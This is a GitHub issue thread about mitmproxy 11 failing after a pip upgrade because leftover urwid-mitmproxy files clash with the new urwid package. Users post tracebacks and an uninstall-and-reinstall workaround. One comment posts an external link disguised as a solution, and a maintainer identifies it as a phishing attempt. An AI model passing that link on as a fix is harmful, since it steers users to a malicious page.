### ISSUE TITLE
mitmproxy 11 installed via pip fails due to new urwid requirement - undefined symbol: PyUnicode_AS_UNICODE

### ISSUE THREAD

**Issue by wdormann** [mitmproxy/mitmproxy#7227]
#### Problem Description
In taking a system (Ubuntu 24.04 with miniconda (Python 3.12)) that successfully had mitmproxy 10 installed, upgrading to mitmproxy 11 via pip causes installation of a new `urwid` package, which now errors out with: `undefined symbol: PyUnicode_AS_UNICODE`

#### Steps to reproduce the behavior:
1. Install mitmproxy 10 on a system with Python 3.12
2. Upgrade via pip to mitmproxy 11.0.0
3. Try running mitmproxy after upgrade

The prior pip-installed mitmproxy 10 had a dependency package `urwid-mitmproxy`. Perhaps this urwid package was created to avoid the `PyUnicode_AS_UNICODE` error?  Or possibly urwid has changed since the version 2.1.2.1 in a way that introduces the `PyUnicode_AS_UNICODE` problem?  Either way, before the upgrade:

```
tapioca@ubuntu2404:~/tapioca$ pip list | grep -E "urwid|mitmproxy"
mitmproxy               10.3.0
mitmproxy_rs            0.5.2
urwid-mitmproxy         2.1.2.1
```

Now, if I upgrade, I get a new version of `urwid` installed, presumably due to the use of `WidgetWrap` and potentially more.

```
tapioca@ubuntu2404:~/tapioca$ pip install mitmproxy --upgrade > /dev/null
tapioca@ubuntu2404:~/tapioca$ pip list | grep -E "urwid|mitmproxy"
mitmproxy               11.0.0
mitmproxy_rs            0.9.2
urwid                   2.6.15
urwid-mitmproxy         2.1.2.1
```

In this state, mitmproxy will fail to run:

```
tapioca@ubuntu2404:~/tapioca$ mitmproxy
Traceback (most recent call last):
  File "/home/tapioca/miniconda/bin/mitmproxy", line 8, in <module>
    sys.exit(mitmproxy())
             ^^^^^^^^^^^
  File "/home/tapioca/miniconda/lib/python3.12/site-packages/mitmproxy/tools/main.py", line 141, in mitmproxy
    from mitmproxy.tools import console
  File "/home/tapioca/miniconda/lib/python3.12/site-packages/mitmproxy/tools/console/__init__.py", line 1, in <module>
    from mitmproxy.tools.console import master
  File "/home/tapioca/miniconda/lib/python3.12/site-packages/mitmproxy/tools/console/master.py", line 14, in <module>
    import urwid
  File "/home/tapioca/miniconda/lib/python3.12/site-packages/urwid/__init__.py", line 30, in <module>
    from urwid.canvas import (
  File "/home/tapioca/miniconda/lib/python3.12/site-packages/urwid/canvas.py", line 30, in <module>
    from urwid.str_util import calc_text_pos, calc_width
ImportError: /home/tapioca/miniconda/lib/python3.12/site-packages/urwid/str_util.cpython-312-x86_64-linux-gnu.so: undefined symbol: PyUnicode_AS_UNICODE
```

#### System Information
Paste the output of "mitmproxy --version" here.

(see above)

**Comment by mhils** [comment]
Thanks. Could you pleae file this upstream with urwid and link the upstream report here?

**Comment by wdormann** [comment]
https://github.com/urwid/urwid/issues/937

**Comment by wdormann** [comment]
Ok, it seems that there's nothing wrong with urwid itself.
The problem was the left-behind components from `urwid-mitmproxy`

If the new mitmproxy uses straight-up `urwid`, is there perhaps any way of having the pip installation process remove any existing older `urwid-mitmproxy` package if it's installed?  Manually removing `urwid-mitmproxy` solved this problem for me.

**Comment by mhils** [comment]
> If the new mitmproxy uses straight-up `urwid`, is there perhaps any way of having the pip installation process remove any existing older `urwid-mitmproxy` package if it's installed? Manually removing `urwid-mitmproxy` solved this problem for me.

I don't think that exists with pip. Let's see if we have more folks who are running into this. If so, we can conceivably ship a new mitmproxy-urwid release that's basically empty to force uninstall. But that requires us to first update urwid-mitmproxy and then in a second step ship a mitmproxy patch release, so I'm not super keen. :)

**Comment by wdormann** [comment]
Just for the record, this is an Ubuntu 24.04 system with Miniconda, which did a `pip install mitmproxy` on April 30, 2024, if it matters.
From my logs:
```
Collecting mitmproxy
  Downloading mitmproxy-10.3.0-py3-none-any.whl.metadata (8.5 kB)
<snip>
Collecting urwid-mitmproxy<2.2,>=2.1.1 (from mitmproxy)
  Downloading urwid-mitmproxy-2.1.2.1.tar.gz (634 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 634.4/634.4 kB 13.6 MB/s eta 0:00:00
  Preparing metadata (setup.py): started
  Preparing metadata (setup.py): finished with status 'done'
```

So I think that `urwid-mitmproxy` existed at that point in time at least.  If anything, this ticket will be around for anybody googling for the error...

**Comment by AchilleasTsiamoulis** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by mhils** [comment]
Please do not click on the link shared by @AchilleasTsiamoulis, this is not a solution for this problem but a malicious phishing attempt.

**Comment by pgaertig** [comment]
I experienced the similar issue. Here is my report with terminal history to fix it. Simply the removal of `urwid-mitmproxy` and reinstall of `urwind` via `mitmproxy` have helped.

```
$ mitmproxy --version
Traceback (most recent call last):
  File "/home/user/.asdf/installs/python/3.12.6/bin/mitmproxy", line 8, in <module>
    sys.exit(mitmproxy())
             ^^^^^^^^^^^
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/main.py", line 131, in mitmproxy
    from mitmproxy.tools import console
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/__init__.py", line 1, in <module>
    from mitmproxy.tools.console import master
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/master.py", line 14, in <module>
    import urwid
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/__init__.py", line 26, in <module>
    from urwid.widget import (FLOW, BOX, FIXED, LEFT, RIGHT, CENTER, TOP, MIDDLE,
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/widget/__init__.py", line 5, in <module>
    from .bar_graph import BarGraph, BarGraphError, BarGraphMeta, GraphVScale, scale_bar_values
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/widget/bar_graph.py", line 9, in <module>
    from .text import Text
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/widget/text.py", line 8, in <module>
    from urwid.str_util import calc_width
ImportError: /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/str_util.cpython-312-x86_64-linux-gnu.so: undefined symbol: PyUnicode_AS_UNICODE
```
This indicates it was `10.1.1` having problem:
```
$ pip3 install mitmproxy
Requirement already satisfied: mitmproxy in /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages (10.1.1)
[..cut..]
Requirement already satisfied: urwid-mitmproxy<2.2,>=2.1.1 in /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages (from mitmproxy) (2.1.2.1)
[..cut..]
```
No upgrade. Still fails with the same stack trace. Here is the upgrade:

```
$ pip3 install --upgrade mitmproxy
Requirement already satisfied: mitmproxy in /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages (10.1.1)
Collecting mitmproxy
  Downloading mitmproxy-11.0.0-py3-none-any.whl.metadata (9.4 kB)
[..cut..]
Requirement already satisfied: urwid<=2.6.15,>=2.6.14 in /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages (from mitmproxy) (2.6.15)
[..cut..]
Downloading mitmproxy-11.0.0-py3-none-any.whl (1.7 MB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.7/1.7 MB 11.5 MB/s eta 0:00:00
[..cut..]
Installing collected packages: pyperclip, protobuf, mitmproxy-rs, flask, cryptography, pyOpenSSL, aioquic, mitmproxy
[..cut..]
  Attempting uninstall: mitmproxy
    Found existing installation: mitmproxy 10.1.1
    Uninstalling mitmproxy-10.1.1:
      Successfully uninstalled mitmproxy-10.1.1
Successfully installed aioquic-1.2.0 cryptography-43.0.3 flask-3.0.3 mitmproxy-11.0.0 mitmproxy-rs-0.9.3 protobuf-5.28.2 pyOpenSSL-24.2.1 pyperclip-1.9.0
```
After upgrade the issue still persists:
```
$ mitmproxy --listen-port 9000 --mode reverse:https://panel.b2b-online.pl
Traceback (most recent call last):
  File "/home/user/.asdf/installs/python/3.12.6/bin/mitmproxy", line 8, in <module>
    sys.exit(mitmproxy())
             ^^^^^^^^^^^
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/main.py", line 141, in mitmproxy
    from mitmproxy.tools import console
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/__init__.py", line 1, in <module>
    from mitmproxy.tools.console import master
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/master.py", line 14, in <module>
    import urwid
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/__init__.py", line 26, in <module>
    from urwid.widget import (FLOW, BOX, FIXED, LEFT, RIGHT, CENTER, TOP, MIDDLE,
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/widget/__init__.py", line 5, in <module>
    from .bar_graph import BarGraph, BarGraphError, BarGraphMeta, GraphVScale, scale_bar_values
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/widget/bar_graph.py", line 9, in <module>
    from .text import Text
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/widget/text.py", line 8, in <module>
    from urwid.str_util import calc_width
ImportError: /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/str_util.cpython-312-x86_64-linux-gnu.so: undefined symbol: PyUnicode_AS_UNICODE
```
Tried to upgrade `urwid` manually:

```
$ pip3 install --upgrade urwid
Requirement already satisfied: urwid in /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages (2.6.15)
Collecting urwid
  Downloading urwid-2.6.16-py3-none-any.whl.metadata (11 kB)
Requirement already satisfied: typing-extensions in /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages (from urwid) (4.11.0)
Requirement already satisfied: wcwidth in /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages (from urwid) (0.2.13)
Downloading urwid-2.6.16-py3-none-any.whl (297 kB)
Installing collected packages: urwid
  Attempting uninstall: urwid
    Found existing installation: urwid 2.6.15
    Uninstalling urwid-2.6.15:
      Successfully uninstalled urwid-2.6.15
ERROR: pip's dependency resolver does not currently take into account all the packages that are installed. This behaviour is the source of the following dependency conflicts.
mitmproxy 11.0.0 requires urwid<=2.6.15,>=2.6.14, but you have urwid 2.6.16 which is incompatible.
Successfully installed urwid-2.6.16
```

Now the stack is same as attached by @wdormann:

```
$ mitmproxy --version
Traceback (most recent call last):
  File "/home/user/.asdf/installs/python/3.12.6/bin/mitmproxy", line 8, in <module>
    sys.exit(mitmproxy())
             ^^^^^^^^^^^
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/main.py", line 141, in mitmproxy
    from mitmproxy.tools import console
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/__init__.py", line 1, in <module>
    from mitmproxy.tools.console import master
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/master.py", line 14, in <module>
    import urwid
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/__init__.py", line 30, in <module>
    from urwid.canvas import (
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/canvas.py", line 30, in <module>
    from urwid.str_util import calc_text_pos, calc_width
ImportError: /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/str_util.cpython-312-x86_64-linux-gnu.so: undefined symbol: PyUnicode_AS_UNICODE
```

Removal of seemingly unused `urwid-mitmproxy`:

```
$ pip3 uninstall urwid-mitmproxy
Found existing installation: urwid-mitmproxy 2.1.2.1
Uninstalling urwid-mitmproxy-2.1.2.1:
  Would remove:
    /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/*
    /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid_mitmproxy-2.1.2.1.dist-info/*
  Would not remove (might be manually added):
    /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/display/__init__.py
    /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/display/_posix_raw_display.py
    /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/display/_raw_display_base.py
[..cut..]
    /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/urwid/widget/wimp.py
Proceed (Y/n)? y
  Successfully uninstalled urwid-mitmproxy-2.1.2.1
```

Seemingly broken or to new `urwid` results in this:

```
$ mitmproxy --version
Traceback (most recent call last):
  File "/home/user/.asdf/installs/python/3.12.6/bin/mitmproxy", line 8, in <module>
    sys.exit(mitmproxy())
             ^^^^^^^^^^^
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/main.py", line 141, in mitmproxy
    from mitmproxy.tools import console
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/__init__.py", line 1, in <module>
    from mitmproxy.tools.console import master
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/master.py", line 26, in <module>
    from mitmproxy.tools.console import consoleaddons
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/consoleaddons.py", line 18, in <module>
    from mitmproxy.tools.console import keymap
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/keymap.py", line 13, in <module>
    from mitmproxy.tools.console import commandexecutor
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/commandexecutor.py", line 6, in <module>
    from mitmproxy.tools.console import overlay
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/overlay.py", line 5, in <module>
    from mitmproxy.tools.console import grideditor
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/grideditor/__init__.py", line 1, in <module>
    from . import base
  File "/home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages/mitmproxy/tools/console/grideditor/base.py", line 46, in <module>
    class Cell(urwid.WidgetWrap):
               ^^^^^^^^^^^^^^^^
AttributeError: module 'urwid' has no attribute 'WidgetWrap'
```

Reinstall/upgrade of `mitmproxy` to fix `urwid`.

```
$ pip3 install --upgrade mitmproxy
Requirement already satisfied: mitmproxy in /home/user/.asdf/installs/python/3.12.6/lib/python3.12/site-packages (11.0.0)
[..cut..]
Collecting urwid<=2.6.15,>=2.6.14 (from mitmproxy)
  Using cached urwid-2.6.15-py3-none-any.whl.metadata (11 kB)
[..cut..]
Using cached urwid-2.6.15-py3-none-any.whl (297 kB)
Installing collected packages: urwid
  Attempting uninstall: urwid
    Found existing installation: urwid 2.6.16
    Uninstalling urwid-2.6.16:
      Successfully uninstalled urwid-2.6.16
Successfully installed urwid-2.6.15
```

Fixed:

```
$ mitmproxy --version
Mitmproxy: 11.0.0
Python:    3.12.6
OpenSSL:   OpenSSL 3.3.2 3 Sep 2024
Platform:  Linux-6.8.0-47-generic-x86_64-with-glibc2.39
```

**Comment by meiraxx** [comment]
Newest urwid 2.6.16 causes errors in `mitmproxy`. The following worked for me:
```
pip3 uninstall urwid-mitmproxy
pip install --force-reinstall -v "urwid==2.6.15"
```
